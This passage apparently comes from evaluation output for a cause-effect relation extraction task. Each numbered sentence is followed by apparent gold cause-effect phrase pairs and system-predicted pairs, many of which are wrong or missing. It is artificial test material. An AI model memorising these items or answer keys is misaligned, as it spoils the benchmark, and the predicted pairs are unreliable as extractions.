[(['ticks'], ['rashes']), (['ticks'], ['discomfort']), (['fleas'], ['rashes']), (['fleas'], ['discomfort'])]
[(['ticks'], ['rashes']), (['ticks'], ['discomfort']), (['fleas'], ['rashes']), (['fleas'], ['discomfort'])]
------------------
Sentence-017 Using the product around the house killed germs that were causing flu , colds or sore throat
[(['germs'], ['flu']), (['germs'], ['colds']), (['germs'], ['sore', 'throat'])]
[(['killed', 'germs'], ['flu']), (['killed', 'germs'], ['colds']), (['killed', 'germs'], ['sore', 'throat'])]
------------------
Sentence-018 When the force was generated via the joystick , the reproduced force matched the original force much more accurately
[(['the', 'joystick'], ['the', 'force'])]
[]
------------------
Sentence-019 The problem comes from the widgets resembling HTC's own Sense UI widgets
[(['the', 'widgets'], ['The', 'problem'])]
[(['the', 'widgets'], ['The', 'problem'])]
------------------
Sentence-020 General information about the infection caused by the bacteria called Salmonella , when food is eaten raw or undercooked
[(['the', 'bacteria'], ['the', 'infection'])]
[(['the', 'bacteria'], ['the', 'infection'])]
------------------
Sentence-021 The volunteers enjoy a sense of satisfaction and personal fulfillment from helping others , and recent findings suggest that this feeling may well be a major reason why many people choose to volunteer
[(['helping', 'others'], ['satisfaction']), (['helping', 'others'], ['personal', 'fulfillment'])]
[(['helping', 'others'], ['satisfaction']), (['helping', 'others'], ['personal', 'fulfillment'])]
------------------
Sentence-022 Information about Salmonellosis , an illness caused by a bacteria found in raw food , soil , or water
[(['a', 'bacteria'], ['an', 'illness'])]
[(['a', 'bacteria'], ['an', 'illness'])]
------------------
Sentence-023 The disruption has been caused by work being carried out by track operator Network Rail
[(['work'], ['The', 'disruption'])]
[(['work'], ['The', 'disruption'])]
------------------
Sentence-024 Gross revenues from the selling of crude oil in 2003 reached US 11 508 billion or some 112 85 percent of the amount targeted in the 2003 state budget
[(['the', 'selling'], ['Gross', 'revenues'])]
[(['the', 'selling'], ['Gross', 'revenues'])]
------------------
Sentence-025 More than 4500 tons of nitrogen oxides annually -- a pollutant that causes smog , acid rain , and contributes to asthma attacks and other breathing problems
[(['a', 'pollutant'], ['smog']), (['a', 'pollutant'], ['acid', 'rain']), (['a', 'pollutant'], ['asthma', 'attacks']), (['a', 'pollutant'], ['other', 'breathing', 'problems'])]
[(['a', 'pollutant'], ['smog']), (['a', 'pollutant'], ['acid', 'rain']), (['a', 'pollutant'], ['asthma', 'attacks']), (['a', 'pollutant'], ['other', 'breathing', 'problems'])]
------------------
Sentence-026 Constipation is the most common cause of abdominal pain in the pediatric population
[(['Constipation'], ['abdominal', 'pain'])]
[(['Constipation'], ['abdominal', 'pain'])]
------------------
Sentence-027 The author clearly got a great deal of pleasure from the work and did not allow his vast amount of material to force him into shallow generalizations
[(['the', 'work'], ['pleasure'])]
[(['the', 'work'], ['pleasure'])]
------------------
Sentence-028 Ordinary warts on the hands and feet are caused by viruses , which only affect humans
[(['viruses'], ['Ordinary', 'warts'])]
[(['viruses'], ['Ordinary', 'warts'])]
------------------
Sentence-029 In a person who already has some neck tension from stress , such an event can lead to a long-term increase of neck tension
[(['stress'], ['some', 'neck', 'tension']), (['such', 'an', 'event'], ['a', 'long-term', 'increase'])]
[(['stress'], ['some', 'neck', 'tension']), (['an', 'event'], ['some', 'neck', 'tension'])]
------------------
Sentence-030 The reports regarding the casualties has been announced and the loss that has been caused by the quake is being estimated
[(['the', 'quake'], ['the', 'loss'])]
[(['the', 'quake'], ['the', 'loss'])]
------------------
Sentence-031 The pressure was caused by the rapid power acceleration at the start
[(['the', 'rapid', 'power', 'acceleration'], ['The', 'pressure'])]
[(['the', 'rapid', 'power', 'acceleration'], ['The', 'pressure'])]
------------------
Sentence-032 The incident was caused by the entry of high pressure gas from a deep formation that got confined in the porthole of the well
[(['the', 'entry'], ['The', 'incident'])]
[(['the', 'entry'], ['The', 'incident']), (['high', 'pressure'], ['The', 'incident'])]
------------------
Sentence-033 A method of mitigating the effect of a market spike caused by the triggering and the election of a conditional order includes monitoring conditional orders
[(['the', 'triggering'], ['a', 'market', 'spike']), (['the', 'election'], ['a', 'market', 'spike'])]
[(['the', 'triggering'], ['a', 'market', 'spike']), (['the', 'election'], ['a', 'market', 'spike'])]
------------------
Sentence-034 The largest landslide triggered by the earthquake is located approximately 32 kilometers southeast of Muzafarrabad in a tributary valley of the Jhelum River
[(['the', 'earthquake'], ['The', 'largest', 'landslide'])]
[(['the', 'earthquake'], ['The', 'largest', 'landslide'])]
------------------
Sentence-035 The debris caused a crash on the Schuylkill , and it has been closed for hours because of the mishap
[(['The', 'debris'], ['a', 'crash']), (['the', 'mishap'], ['closed'])]
[(['The', 'debris'], ['a', 'crash'])]
------------------
Sentence-036 Most deaths from the accident were caused by radiation poisoning
[(['the', 'accident'], ['Most', 'deaths']), (['radiation', 'poisoning'], ['Most', 'deaths'])]
[(['the', 'accident'], ['Most', 'deaths']), (['radiation', 'poisoning'], ['Most', 'deaths'])]
------------------
Sentence-037 Using solar electricity instead of conventional electricity sources helps to reduce pollution that causes smog , acid rain , respiratory illness and global warming
[(['pollution'], ['smog']), (['pollution'], ['acid', 'rain']), (['pollution'], ['respiratory', 'illness']), (['pollution'], ['global', 'warming'])]
[(['pollution'], ['smog']), (['pollution'], ['acid', 'rain']), (['pollution'], ['respiratory', 'illness']), (['pollution'], ['global', 'warming'])]
------------------
Sentence-038 The wire had caused a slight injury on the ventral side of the neck and at the base of horns
[(['The', 'wire'], ['a', 'slight', 'injury'])]
[(['The', 'wire'], ['a', 'slight', 'injury'])]
------------------
Sentence-039 A stereo buss outputs the stereo buss signal ; a record buss outputs the record buss signal
[(['A', 'stereo', 'buss'], ['the', 'stereo', 'buss', 'signal']), (['a', 'record', 'buss'], ['the', 'record', 'buss', 'signal'])]
[]
------------------
Sentence-040 These are all symptoms of the muscle paralysis caused by the bacterial toxin
[(['the', 'bacterial', 'toxin'], ['the', 'muscle', 'paralysis'])]
[(['the', 'bacterial', 'toxin'], ['all', 'symptoms']), (['the', 'bacterial', 'toxin'], ['the', 'muscle', 'paralysis'])]
------------------
Sentence-041 The cow makes a sound called lowing , also known as mooing
[(['The', 'cow'], ['a', 'sound'])]
[(['The', 'cow'], ['a', 'sound'])]
------------------
Sentence-042 The changes now seen in the endometrium are caused by a hormone called progesterone
[(['a', 'hormone'], ['The', 'changes'])]
[(['a', 'hormone'], ['The', 'changes'])]
------------------
Sentence-043 Generally it appears that most of the damage was caused by the winds and the rough seas
[(['the', 'winds'], ['the', 'damage']), (['the', 'rough', 'seas'], ['the', 'damage'])]
[(['the', 'winds'], ['the', 'damage']), (['the', 'rough', 'seas'], ['the', 'damage'])]
------------------
Sentence-044 Earthquakes are caused by the discharge of accumulated along geologic faults
[(['the', 'discharge'], ['Earthquakes'])]
[(['the', 'discharge'], ['Earthquakes'])]
------------------
Sentence-045 Dry air , dust and wind dry out the nose and throat and cause nosebleeds , coughing , wheezing , and other short-term respiratory problems
[(['Dry', 'air'], ['nosebleeds']), (['Dry', 'air'], ['coughing']), (['Dry', 'air'], ['wheezing']), (['Dry', 'air'], ['other', 'short-term', 'respiratory', 'problems']), (['dust'], ['nosebleeds']), (['dust'], ['coughing']), (['dust'], ['wheezing']), (['dust'], ['other', 'short-term', 'respiratory', 'problems']), (['wind'], ['nosebleeds']), (['wind'], ['coughing']), (['wind'], ['wheezing']), (['wind'], ['other', 'short-term', 'respiratory', 'problems'])]
[(['Dry', 'air'], ['nosebleeds']), (['Dry', 'air'], ['coughing']), (['Dry', 'air'], ['wheezing']), (['Dry', 'air'], ['other', 'short-term', 'respiratory', 'problems']), (['dust'], ['nosebleeds']), (['dust'], ['coughing']), (['dust'], ['wheezing']), (['dust'], ['other', 'short-term', 'respiratory', 'problems']), (['wind', 'dry'], ['nosebleeds']), (['wind', 'dry'], ['coughing']), (['wind', 'dry'], ['wheezing']), (['wind', 'dry'], ['other', 'short-term', 'respiratory', 'problems'])]
------------------
Sentence-046 The Fujita Scale is used to rate the intensity of a tornado by examining the damage caused by the tornado after it has passed over a man-made structure
[(['the', 'tornado'], ['the', 'damage'])]
[(['the', 'tornado'], ['the', 'damage'])]
------------------
Sentence-047 Every child and young person seen at Starship with intoxication from alcohol or illicit drug use had a social work assessment before leaving the hospital
[(['alcohol', 'or', 'illicit', 'drug', 'use'], ['intoxication'])]
[(['alcohol'], ['intoxication'])]
------------------
Sentence-048 Seniors get much joy from animals
[(['animals'], ['much', 'joy'])]
[(['animals'], ['much', 'joy'])]
------------------
Sentence-049 He created and advocated " flower power,"a strategy in which antiwar demonstrators promoted positive values like peace and love to dramatize their opposition to the destruction and death caused by the war in Vietnam
[(['the', 'war'], ['the', 'destruction']), (['the', 'war'], ['death'])]
[(['the', 'war'], ['the', 'destruction']), (['the', 'war'], ['death'])]
------------------
Sentence-050 I have found that I have extremely sensitive skin and most cleaners cause rash or a burning sensation if it has contact with my skin
[(['most', 'cleaners'], ['rash']), (['most', 'cleaners'], ['a', 'burning', 'sensation'])]
[]
------------------
Sentence-051 The grief from sudden death is completely different from expected death , when families have time to prepare and say goodbye
[(['sudden', 'death'], ['The', 'grief'])]
[(['sudden', 'death'], ['The', 'grief'])]
------------------
Sentence-052 The transmitter emits a constant radio signal to crea
[(['The', 'transmitter'], ['a', 'constant', 'radio', 'signal'])]
[(['The', 'transmitter'], ['a', 'constant', 'radio', 'signal'])]
------------------
Sentence-053 The explosion caused a gas leak on the pipeline near the village of Pouce Coupe , south of Dawson Creek
[(['The', 'explosion'], ['a', 'gas', 'leak'])]
[(['The', 'explosion'], ['a', 'gas', 'leak'])]
------------------
Sentence-054 There were setbacks and technical problems that ensued from the location design , flooding , and moisture that plagued the winery and bumped up the investment cost beyond the initial budgetary estimates
[(['the', 'location', 'design'], ['setbacks']), (['the', 'location', 'design'], ['technical', 'problems']), (['flooding'], ['setbacks']), (['flooding'], ['technical', 'problems']), (['moisture'], ['setbacks']), (['moisture'], ['technical', 'problems'])]
[(['the', 'location', 'design'], ['setbacks']), (['the', 'location', 'design'], ['technical', 'problems']), (['flooding'], ['setbacks']), (['flooding'], ['technical', 'problems']), (['moisture'], ['setbacks']), (['moisture'], ['technical', 'problems'])]
------------------
Sentence-055 Sudden death from inhalation of petroleum distillates is well recognised in misuses of volatile substances
[(['inhalation'], ['Sudden', 'death'])]
[(['inhalation'], ['Sudden', 'death'])]
------------------
Sentence-056 The hull caused a scratch on the eye and that is why it's not healing all the way
[(['The', 'hull'], ['a', 'scratch'])]
[(['The', 'hull'], ['a', 'scratch'])]
------------------
Sentence-057 The widespread opinion that protein and phosphorus cause calcium loss is examined
[(['protein'], ['calcium', 'loss']), (['phosphorus'], ['calcium', 'loss'])]
[(['The', 'widespread', 'opinion'], ['calcium', 'loss']), (['protein'], ['calcium', 'loss']), (['phosphorus'], ['calcium', 'loss'])]
------------------
Sentence-058 Eighty-four percent of the complications resulted in patient deaths , while 16 percent resulted in a serious injury
[(['the', 'complications'], ['patient', 'deaths']), (['the', 'complications'], ['a', 'serious', 'injury'])]
[(['the', 'complications'], ['patient', 'deaths']), (['the', 'complications'], ['a', 'serious', 'injury'])]
------------------
Sentence-059 The crashes resulted in the collapse of much of the World Trade Center complex , the destruction of part of the southwest side of the Pentagon
[(['The', 'crashes'], ['the', 'collapse']), (['The', 'crashes'], ['the', 'destruction'])]
[(['The', 'crashes'], ['the', 'collapse'])]
------------------
Sentence-060 The pollution from animal factories is also destroying parts of the world's oceans
[(['animal', 'factories'], ['The', 'pollution'])]
[(['animal', 'factories'], ['The', 'pollution'])]
------------------
Sentence-061 When the first model sank in August 1991 , the crash caused a seismic event registering 3 0 on the Richter scale , and left nothing but a pile of debris at 220m of depth
[(['the', 'crash'], ['a', 'seismic', 'event'])]
[(['the', 'crash'], ['a', 'seismic', 'event'])]
------------------
Sentence-062 The clock struck twelve with a loud chime that made me jump
[(['The', 'clock'], ['a', 'loud', 'chime'])]
[]
------------------
Sentence-063 Later on that same day , an electrical short at the Farragut North station caused a fire on the tracks which shut down service three times over the course of the day
[(['an', 'electrical', 'short'], ['a', 'fire'])]
[(['an', 'electrical'], ['a', 'fire'])]
------------------
Sentence-064 Arcane Subtlety reduced the threat caused by Polymorph by 40 at max rank , though the threat caused by the spell is minimal
[(['Polymorph'], ['the', 'threat']), (['the', 'spell'], ['the', 'threat'])]
[(['Polymorph'], ['the', 'threat']), (['the', 'spell'], ['the', 'threat'])]
------------------
Sentence-065 Sip the tea slowly to reduce stomach pain from indigestion , bloating and feeling of fullness
[(['indigestion'], ['stomach', 'pain']), (['bloating'], ['stomach', 'pain']), (['feeling'], ['stomach', 'pain'])]
[(['indigestion'], ['stomach', 'pain']), (['bloating'], ['stomach', 'pain']), (['feeling'], ['stomach', 'pain'])]
------------------
Sentence-066 Alcohol and drugs directly cause suicide by significantly diminishing the reasoning of the person at the time of the suicide
[(['Alcohol'], ['suicide']), (['drugs'], ['suicide'])]
[(['Alcohol'], ['suicide']), (['drugs'], ['suicide'])]
------------------
Sentence-067 Cutler ended up with a bleeding stomach ulcer caused by the stress and hard work supervising their tours twenty-four hours a day
[(['the', 'stress'], ['a', 'bleeding', 'stomach', 'ulcer']), (['hard', 'work'], ['a', 'bleeding', 'stomach', 'ulcer'])]
[(['the', 'stress'], ['a', 'bleeding', 'stomach', 'ulcer']), (['hard', 'work'], ['a', 'bleeding', 'stomach', 'ulcer'])]
------------------
Sentence-068 The movie gives the inaccurate impression that the Apaches all surrendered
[(['The', 'movie'], ['the', 'inaccurate', 'impression'])]
[(['The', 'movie'], ['the', 'inaccurate', 'impression'])]
------------------
Sentence-069 Discussion ensued from the Florida contingent on the fact that very stringent landowner protection laws in Florida make it imperative that the highest supportable appraised vallue be offered first
[(['the', 'Florida', 'contingent'], ['Discussion'])]
[(['the', 'Florida', 'contingent'], ['Discussion'])]
------------------
Sentence-070 The election was caused by the appointment of Donald Sumner , formerly Conservative MP for Orpington , to be a county court judge
[(['the', 'appointment'], ['The', 'election'])]
[(['the', 'appointment'], ['The', 'election'])]
------------------
Sentence-071 The malfunctions on Monday caused delays for patrons waiting to check out or renew books at the branches , and impeded access to personal accounts that allow users to renew or hold books online
[(['The', 'malfunctions'], ['delays'])]
[(['The', 'malfunctions'], ['delays'])]
------------------
Sentence-072 Colds and flu cause inflammation of the mucous membranes of the nose , throat and mouth
[(['Colds'], ['inflammation']), (['flu'], ['inflammation'])]
[(['Colds'], ['inflammation']), (['flu'], ['inflammation'])]
------------------
Sentence-073 Most illnesses , including colds and flu , cause a toxic overload that also increases the stress on the kidneys
[(['colds'], ['a', 'toxic', 'overload']), (['flu'], ['a', 'toxic', 'overload'])]
[(['colds'], ['a', 'toxic', 'overload']), (['flu'], ['a', 'toxic', 'overload'])]
------------------
Sentence-074 An alert victim with a broken neck or severely torn ligament has enough discomfort from the injury and muscle spasm to force him to hold his neck still
[(['the', 'injury'], ['enough', 'discomfort'])]
[(['the', 'injury'], ['enough', 'discomfort']), (['muscle', 'spasm'], ['enough', 'discomfort'])]
------------------
Sentence-075 An oil spill caused by a collision between a ship and a barge closed the ship channel servicing the nation's second largest port
[(['a', 'collision'], ['An', 'oil', 'spill'])]
[(['a', 'collision'], ['An', 'oil', 'spill'])]
------------------
Sentence-076 The funds raised through this appeal have a direct impact on the people affected by the severe devastations caused by the storms
[(['the', 'storms'], ['the', 'severe', 'devastations'])]
[(['the', 'storms'], ['the', 'severe', 'devastations'])]
------------------
Sentence-077 After the war , as the Midway was preparing for retirement , she was called upon one last time to the Philippines to help with an evacuation after the eruption of Mt Pinatubo
[(['the', 'eruption'], ['an', 'evacuation'])]
[(['the', 'war'], ['an', 'evacuation']), (['the', 'eruption'], ['an', 'evacuation'])]
------------------
Sentence-078 Infection is one of the commonest causes of death in burn patients , particularly
[(['Infection'], ['death'])]
[(['Infection'], ['death'])]
------------------
Sentence-079 When a tsunami is generated by a strong offshore earthquake , its first waves would reach the outer coast minutes after the ground stops shaking
[(['a', 'strong', 'offshore', 'earthquake'], ['a', 'tsunami'])]
[(['a', 'strong', 'offshore', 'earthquake'], ['a', 'tsunami']), (['the', 'ground', 'stops', 'shaking'], ['a', 'tsunami'])]
------------------
Sentence-080 The afterglow is produced by shock waves in the jets of tenuous gas that shoot from the blast at almost the speed of light
[(['shock', 'waves'], ['The', 'afterglow'])]
[(['shock', 'waves'], ['The', 'afterglow'])]
------------------
Sentence-081 Eye discomfort from this staring effect is exacerbated by low humidity
[(['this', 'staring', 'effect'], ['Eye', 'discomfort'])]
[(['this', 'staring', 'effect'], ['Eye', 'discomfort']), (['low', 'humidity'], ['Eye', 'discomfort'])]
------------------
Sentence-082 The accident caused a major traffic snarl on the arterial road
[(['The', 'accident'], ['a', 'major', 'traffic', 'snarl'])]
[(['The', 'accident'], ['a', 'major', 'traffic', 'snarl'])]
------------------
Sentence-083 Germs are microscopic organisms that cause sickness or disease
[(['Germs'], ['sickness']), (['Germs'], ['disease'])]
[(['microscopic', 'organisms'], ['sickness']), (['microscopic', 'organisms'], ['disease'])]
------------------
Sentence-084 When I start the engine the car makes a screaching sound
[(['the', 'car'], ['a', 'screaching', 'sound'])]
[(['the', 'engine', 'the', 'car'], ['a', 'screaching', 'sound'])]
------------------
Sentence-085 Over 90 of the cases of ringworm of the scalp are caused by Trichophyton tonsurans , a fungus that infects the hairs and causes them to break
[(['Trichophyton', 'tonsurans'], ['ringworm'])]
[(['Trichophyton', 'tonsurans'], ['ringworm']), (['a', 'fungus'], ['ringworm'])]
------------------
Sentence-086 The accolade was decided upon after an intense discussion between about 200 members
[(['an', 'intense', 'discussion'], ['The', 'accolade'])]
[]
------------------
Sentence-087 The boom and shaking was caused by the asteroid that passed Earth yesterday
[(['the', 'asteroid'], ['The', 'boom']), (['the', 'asteroid'], ['shaking'])]
[(['the', 'asteroid'], ['The', 'boom']), (['the', 'asteroid'], ['shaking'])]
------------------
Sentence-088 The damage caused by a bullet depends on the amount of energy which it transfers to the tissues
[(['a', 'bullet'], ['The', 'damage'])]
[(['a', 'bullet'], ['The', 'damage'])]
------------------
Sentence-089 Headaches , dizziness , balance problems , and neck and back pain were caused by the work injury
[(['the', 'work', 'injury'], ['Headaches']), (['the', 'work', 'injury'], ['dizziness']), (['the', 'work', 'injury'], ['balance', 'problems']), (['the', 'work', 'injury'], ['neck', 'and', 'back', 'pain'])]
[(['the', 'work', 'injury'], ['Headaches']), (['the', 'work', 'injury'], ['dizziness']), (['the', 'work', 'injury'], ['balance', 'problems']), (['the', 'work', 'injury'], ['neck', 'and', 'back', 'pain'])]
------------------
Sentence-090 The energy of emission produces the separation field
[(['The', 'energy'], ['the', 'separation', 'field'])]
[]
------------------
Sentence-091 Vulvodynia is the cause of chronic vulval pain in the absence of skin disease and infection
[(['Vulvodynia'], ['chronic', 'vulval', 'pain'])]
[(['Vulvodynia'], ['chronic', 'vulval', 'pain'])]
------------------
Sentence-092 Landslides caused the majority of the deaths
[(['Landslides'], ['the', 'deaths'])]
[(['Landslides'], ['the', 'majority']), (['Landslides'], ['the', 'deaths'])]
------------------
Sentence-093 The pipeline had to face the following main concerns from opposition : disturbance of animal migration patterns , environmental damage from spills , geological concerns and the Alaskan permafrost
[(['spills'], ['environmental', 'damage'])]
[(['opposition'], ['environmental', 'damage']), (['disturbance'], ['environmental', 'damage']), (['spills'], ['environmental', 'damage']), (['geological', 'concerns'], ['environmental', 'damage']), (['the', 'Alaskan', 'permafrost'], ['environmental', 'damage'])]
------------------
Sentence-094 The swelling of the vocal fold mucosa is caused by smoking
[(['smoking'], ['The', 'swelling'])]
[(['smoking'], ['The', 'swelling'])]
------------------
Sentence-095 Paralysis or convulsions are caused by hormone deficiencies and imbalances
[(['hormone', 'deficiencies', 'and', 'imbalances'], ['Paralysis']), (['hormone', 'deficiencies', 'and', 'imbalances'], ['convulsions'])]
[(['hormone', 'deficiencies'], ['Paralysis']), (['hormone', 'deficiencies'], ['convulsions']), (['imbalances'], ['Paralysis']), (['imbalances'], ['convulsions'])]
------------------
Sentence-096 In economic terms , the ecological catastrophe caused by the Prestige oil spill is comparable with that caused by the Exxon Valdez
[(['the', 'Prestige', 'oil', 'spill'], ['the', 'ecological', 'catastrophe']), (['the', 'Exxon', 'Valdez'], ['the', 'ecological', 'catastrophe'])]
[(['the', 'Prestige', 'oil', 'spill'], ['the', 'ecological', 'catastrophe']), (['the', 'Exxon', 'Valdez'], ['the', 'ecological', 'catastrophe'])]
------------------
Sentence-097 Inhibition through synaptic depression is unlike the previous forms of inhibition in that it turns on more slowly and thus acts as delayed negative feedback
[(['synaptic', 'depression'], ['Inhibition'])]
[(['synaptic', 'depression'], ['Inhibition'])]
------------------
Sentence-098 Before he leaves Ephesus , however , a riot breaks out , instigated by the silversmiths who manufacture idols of the goddess Artemis ; they are afraid that Paul's evangelistic success will ruin their business
[(['the', 'silversmiths'], ['a', 'riot'])]
[(['the', 'silversmiths'], ['a', 'riot', 'breaks'])]
------------------
Sentence-099 As the molten metal cools , it hardens and assumes the shape created by the mold's cavity
[(['the', "mold's", 'cavity'], ['the', 'shape'])]
[(['the', "mold's", 'cavity'], ['the', 'shape'])]
------------------
Sentence-100 Whooping cough is another name for the pertussis , an infection of the airways caused by the bacteria bordetella pertussis
[(['the', 'bacteria', 'bordetella', 'pertussis'], ['the', 'pertussis'])]
[(['the', 'bacteria', 'bordetella', 'pertussis'], ['an', 'infection'])]
------------------
Sentence-101 The accident caused a traffic snarl on the ever busy bridge leading to diversions to other routes
[(['The', 'accident'], ['a', 'traffic', 'snarl'])]
[(['The', 'accident'], ['a', 'traffic', 'snarl'])]
------------------
Sentence-102 The genreal anesthetic cause unconsciousness and insensibility to paid and are used for major surgical procedures
[(['The', 'genreal', 'anesthetic'], ['unconsciousness']), (['The', 'genreal', 'anesthetic'], ['insensibility'])]
[(['The', 'genreal', 'anesthetic'], ['unconsciousness'])]
------------------
Sentence-103 The alleged abuse resulted in bruises and swelling of the brain
[(['The', 'alleged', 'abuse'], ['bruises']), (['The', 'alleged', 'abuse'], ['swelling'])]
[(['The', 'alleged', 'abuse'], ['bruises']), (['The', 'alleged', 'abuse'], ['swelling'])]
------------------
Sentence-104 Companies face big risk from loss of key employees
[(['loss'], ['big', 'risk'])]
[(['loss'], ['big', 'risk'])]
------------------
Sentence-105 Obama's economic policies are turning into a global disaster
[(["Obama's", 'economic', 'policies'], ['a', 'global', 'disaster'])]
[]
------------------
Sentence-106 Tsunamis are caused by the sudden displacement of large volumes of water
[(['the', 'sudden', 'displacement'], ['Tsunamis'])]
[(['the', 'sudden', 'displacement'], ['Tsunamis'])]
------------------
Sentence-107 The electricity is produced by 440 nuclear reactors in 31 countries
[(['440', 'nuclear', 'reactors'], ['The', 'electricity'])]
[(['440', 'nuclear', 'reactors'], ['The', 'electricity'])]
------------------
Sentence-108 The relative calm produced by the Shia ceasefire has coincided with what the CIA is now calling the " near strategic defeat " of al-Qaeda in Iraq
[(['the', 'Shia', 'ceasefire'], ['The', 'relative', 'calm'])]
[(['the', 'Shia', 'ceasefire'], ['The', 'relative', 'calm'])]
------------------
Sentence-109 A trend has been caused by the growing absolute numbers of young people on the planet , and by the rising unemployment rate
[(['the', 'growing', 'absolute', 'numbers'], ['A', 'trend']), (['the', 'rising', 'unemployment', 'rate'], ['A', 'trend'])]
[(['the', 'growing', 'absolute', 'numbers'], ['A', 'trend']), (['the', 'rising', 'unemployment', 'rate'], ['A', 'trend'])]
------------------
Sentence-110 Patients with adenomyosis experience pain from this disease in the early 30's
[(['this', 'disease'], ['adenomyosis', 'experience', 'pain'])]
[(['this', 'disease'], ['pain'])]
------------------
Sentence-111 Liver plays key role in how steroids cause diabetes and hypertension
[(['steroids'], ['diabetes']), (['steroids'], ['hypertension'])]
[(['Liver'], ['diabetes']), (['Liver'], ['hypertension']), (['steroids'], ['diabetes']), (['steroids'], ['hypertension'])]
------------------
Sentence-112 The drag caused by the Earth's atmosphere works against a rocket or a water molecule
[(['the', "Earth's", 'atmosphere'], ['The', 'drag'])]
[(['the', "Earth's", 'atmosphere', 'works'], ['The', 'drag'])]
------------------
Sentence-113 Finally , Slone's fear of AIDS and the mental distress she suffered from this fear were caused by the needle stab
[(['the', 'needle', 'stab'], ["Slone's", 'fear']), (['the', 'needle', 'stab'], ['the', 'mental', 'distress'])]
[(['the', 'needle', 'stab'], ['the', 'mental', 'distress']), (['the', 'needle', 'stab'], ['this', 'fear'])]
------------------
Sentence-114 Conflict had caused the collapse of the Somali Republic
[(['Conflict'], ['the', 'collapse'])]
[(['Conflict'], ['the', 'collapse'])]
------------------
Sentence-115 The dust , noise , and sleep deprivation produced by the construction are intolerable
[(['the', 'construction'], ['The', 'dust']), (['the', 'construction'], ['noise']), (['the', 'construction'], ['sleep', 'deprivation'])]
[(['the', 'construction'], ['sleep', 'deprivation'])]
------------------
Sentence-116 If a participant complaint is the source of an investigative lead , interim contact with the participant should be made by the investigator
[(['a', 'participant', 'complaint'], ['an', 'investigative', 'lead'])]
[(['a', 'participant', 'complaint'], ['an', 'investigative', 'lead']), (['a', 'participant', 'complaint'], ['interim', 'contact'])]
------------------
Sentence-117 The incoming water caused a stain on the wall that , through the lens of pareidolia , looked like a bearded man with a big afro hairdo
[(['The', 'incoming', 'water'], ['a', 'stain'])]
[(['The', 'incoming', 'water'], ['a', 'stain'])]
------------------
Sentence-118 Much like the virus that caused the 1918 flu pandemic , this new H1N1 flu virus affects young adults and school children in greater numbers
[(['the', 'virus'], ['the', '1918', 'flu', 'pandemic'])]
[(['the', 'virus'], ['the', '1918', 'flu', 'pandemic'])]
------------------
Sentence-119 The cysts are caused by chronic inflammation of the perichondrium with production of serous fluid between the perichondrium and cartilage
[(['chronic', 'inflammation'], ['The', 'cysts'])]
[(['chronic', 'inflammation'], ['The', 'cysts'])]
------------------
Sentence-120 Menopause and PMS cause stress and anxiety even without imbalanced hormones
[(['Menopause'], ['stress']), (['Menopause'], ['anxiety']), (['PMS'], ['stress']), (['PMS'], ['anxiety'])]
[(['Menopause'], ['stress']), (['Menopause'], ['anxiety']), (['PMS'], ['stress']), (['PMS'], ['anxiety'])]
------------------
Sentence-121 A spaghetti pie served at a church dinner had caused the poisoning of one hundred people
[(['A', 'spaghetti', 'pie'], ['the', 'poisoning'])]
[(['A', 'spaghetti', 'pie'], ['the', 'poisoning'])]
------------------
Sentence-122 About 30 ducks were found dead in Klamath County in the past two days , and officials are investigating whether the deaths are from a cholera outbreak
[(['a', 'cholera', 'outbreak'], ['the', 'deaths'])]
[(['a', 'cholera', 'outbreak'], ['the', 'deaths'])]
------------------
Sentence-123 Aware of the suffering caused by exploitation , social injustice , stealing , and oppression , I am committed to cultivate loving kindness and learn ways to work for the well-being of people , animals , plants , and minerals
[(['exploitation'], ['the', 'suffering']), (['social', 'injustice'], ['the', 'suffering']), (['stealing'], ['the', 'suffering']), (['oppression'], ['the', 'suffering'])]
[(['exploitation'], ['the', 'suffering']), (['social', 'injustice'], ['the', 'suffering']), (['stealing'], ['the', 'suffering']), (['oppression'], ['the', 'suffering'])]
------------------
Sentence-124 Getting help has reduced the time to reverse all the irritation that had been caused by the fungus
[(['the', 'fungus'], ['all', 'the', 'irritation'])]
[(['the', 'fungus'], ['all', 'the', 'irritation'])]
------------------
Sentence-125 The worst pain of all was caused by the torment to her head which was like the pain of thorns pressing into her
[(['the', 'torment'], ['The', 'worst', 'pain'])]
[(['the', 'torment'], ['The', 'worst', 'pain'])]
------------------
Sentence-126 Oak root and chamomile provide a gentle astringent that helps reduce inflammation and calms skin irritation from the sun and environmental pollutants
[(['the', 'sun'], ['skin', 'irritation']), (['environmental', 'pollutants'], ['skin', 'irritation'])]
[(['the', 'sun'], ['inflammation']), (['the', 'sun'], ['calms', 'skin', 'irritation']), (['environmental', 'pollutants'], ['inflammation']), (['environmental', 'pollutants'], ['calms', 'skin', 'irritation'])]
------------------
Sentence-127 The earthquake caused the failures of the electric power system , the water supply system , the sewer system , the telephone and telegraph systems
[(['The', 'earthquake'], ['the', 'failures'])]
[(['The', 'earthquake'], ['the', 'failures'])]
------------------
Sentence-128 Plantar warts are caused by a virus that infects the outer layer of skin on the soles of the feet
[(['a', 'virus'], ['Plantar', 'warts'])]
[(['a', 'virus'], ['Plantar', 'warts'])]
------------------
Sentence-129 The contortions are caused by gravitational interactions with the small satellites Prometheus and Pandora
[(['gravitational', 'interactions'], ['The', 'contortions'])]
[(['gravitational', 'interactions'], ['The', 'contortions'])]
------------------
Sentence-130 Givers gain moral strength and happiness from giving
[(['giving'], ['moral', 'strength']), (['giving'], ['happiness'])]
[(['giving'], ['moral', 'strength']), (['giving'], ['happiness'])]
------------------
Sentence-131 Thus , evaluating capital punishment as a form of retribution is reduced by Sellin to merely estimating the proportion of capital murders that result in execution
[(['capital', 'murders'], ['execution'])]
[(['capital', 'murders'], ['retribution']), (['capital', 'murders'], ['execution'])]
------------------
Sentence-132 The presentation uses animation to show how germs and microbes cause sickness , and outlines simple preventive measures
[(['germs'], ['sickness']), (['microbes'], ['sickness'])]
[(['germs'], ['sickness']), (['microbes'], ['sickness'])]
------------------
Sentence-133 The poet Essex Hemphill conquered sorrow after the loss of a friend by taking up the cause of that friend
[(['the', 'loss'], ['sorrow'])]
[(['the', 'loss'], ['sorrow'])]
------------------
Sentence-134 Pneumococcal meningitis is caused by pneumococcus bacteria , which also cause several diseases of the respiratory system , including pneumonia
[(['pneumococcus', 'bacteria'], ['Pneumococcal', 'meningitis']), (['pneumococcus', 'bacteria'], ['several', 'diseases'])]
[(['pneumococcus', 'bacteria'], ['Pneumococcal', 'meningitis']), (['pneumococcus', 'bacteria'], ['several', 'diseases'])]
------------------
Sentence-135 Traffic vibrations on the street outside had caused the movement of the light
[(['Traffic', 'vibrations'], ['the', 'movement'])]
